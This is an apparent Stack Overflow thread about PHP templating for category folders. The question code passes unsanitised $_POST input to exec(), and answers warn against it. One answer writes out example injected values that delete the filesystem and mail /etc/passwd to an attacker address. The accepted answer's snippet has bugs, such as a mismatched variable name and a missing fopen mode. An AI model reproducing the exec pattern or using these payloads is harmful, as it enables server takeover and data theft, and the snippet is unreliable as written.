# What is the best way to change matched words by one other in a file?

Tags: php, file, exec

I'm on a website project and administrators are able to create categories. When they do make them the name of the category is added to the database.
In the PHP file that processes the form used to create categories, I create a directory with the given name in the specific directory of my host, which at this time looks like:

```
exec('mkdir /homezx/user/website/categories/' . $_POST['name']);
```

It works fine, but now I'd like to copy a template from a resource folder to this new created directory (would be the index of it) and I know how to do it.

```
exec('cp .../templates/index.php /.../categories/' . $_POST['name'] . '/index.php');
```

The problem is I want to craft this template so it can fit the folder where it is placed.
In the template file, I've replace all the parts that will be different from one to one index with the string '%name%'.

What could be the best way to copy this file in a created folder, after having changed all the '%name%' by a given name (e.g. in the title tag)?

Comment: That code gave me instant heartburn.

Comment: You do know that PHP has a mkdir (http://us.php.net/manual/en/function.mkdir.php) and copy (http://us.php.net/manual/en/function.copy.php) function right?

Comment: This my friend is a wide open security breach. Don't do that.

Comment: Full Stop!  NEVER use exec with variables, period.  Secondly, NEVER directly inject data from users (GET|POST|COOKIE) into you code.  That first line breaks both those rules.

Comment: @stefgosselin what's wrong with that code ? I mean why to preferentially use the mkdir php function instead than exec ?

Comment: the code above is just for the sake of one line, I'm not injecting user input directly in the code.

Comment: Read my answer.  Again, this is friendly advice you can do as you wish it's your data that's at stake, not mine.

Comment: You sure got everybody going. Use the PHP-native functions.

Answer (score 1, accepted):

```
$name=$_POST['name'];

mkdir($path_to_new_folder);
$template=fopen($path_to_template);
$str=file_get_contents($template);
$newstr=str_replace('%name%',$name,$str);
fclose($template);
$newfile=fopen($path_to_new_folder.'/index.php','w');
fwrite($newfile,$new_str);
fclose($newfile);
```

is this what you're trying to do? it will open your templace, replace %name% with the new name, create the directory, and the new file, write the edited template file and save it

Comment: hey great stuff this is precisely what I tried to make ! thanks

Comment: Anyway is str_replace('%name%', $name) gonna replace all the %name% by the given name in the string ?

Comment: thank you ! a new question occurs reading your the code, when not specified what is the value of the mode in fopen function ?

Comment: Just Google php fopen, go to the pho.net link, its described thoroughly there

Comment: I ask so cause when I try to fopen my file and sure enough this is the right path the function return a FALSE value, where could the trouble come from ?
ps : sorry to be so pushy but I've read all the php fopen manual and I can't figure out what is the problem, thanks for your concern

Comment: I fixed the problem, file_get_contents first parameter waits for a string not a resource

Answer (score 1):

I am by no means a hacker, nor even close to that. Thse examples probably would not even work on first try, this is just to get you thinkin. What if $_POST['name'] contains ...

```
$_POST['name'] = ";rm -rf /"; // ;ends the mkdir instruction ..

or ...

$_POST['name'] = ";mail -s “Pawned” badguy@allyourbasebelongtous.com < /etc/passwd";
```

Friendly advice, never ever ever use exec like that. Better yet, never ever ever use exec if you can avoid it, *especially* on web-based applications.

Comment: You did better than I did on the cracker stuff, I couldn't think of any actual exploits. I just know SOMETHING is possible, and it's not good.

Answer (score 1):

It is advisable to use PHP's `mkdir()` and `copy()` functions. For example, couldn't `$_POST['name']` be anything? Do you really want to `exec()` *anything*?

Secondly, to accomplish the templating, you can use something as simple as this.

```
$template = file_get_contents('template.html');
$replacements = array(
    '%name%' => 'Oddantfr'
);
$contents = str_replace(
    array_keys($replacements),
    array_values($replacements),
    $template
);
file_put_contents('template.html', $contents);
```

Answer (score 0):

This is not an answer to the question per se, but a comment that cannot be contained in a comment. However, you need to know this if you don't already.

```
exec('mkdir /homezx/user/website/categories/' . $_POST['name']);
```

This is very very very bad. Do NOT do this. When you run an `exec()` in PHP, the first argument is run as a string, which allows for things like this to take place:

```
$_POST[] ~ ".'; i0wnZU(); doBadStuff();'";
```

Which would make your `exec()`'d code equivalent to:

```
exec('mkdir /homezx/user/website/categories/'.'; i0wnZU(); doBadStuff();');
```

Replace my two funny functions with actual bad things (maybe, a root'd script or something), and you have a security hole allowing access to your server's underlying OS.

Use the PHP-provided `mkdir()` and `copy()` functions, and CLEAN any POST/GET variables you have submitted to you. Do not EVER just plug it in directly into your code uncleaned, especially in database queries.

Comment: Thanks for the advice, I was a bit aware of it since I've already been into database manipulation but the form that creates these categories is for a friend of mine, I'll just warn him about that.

Comment: No problem. I'm still twitching a little from that. :P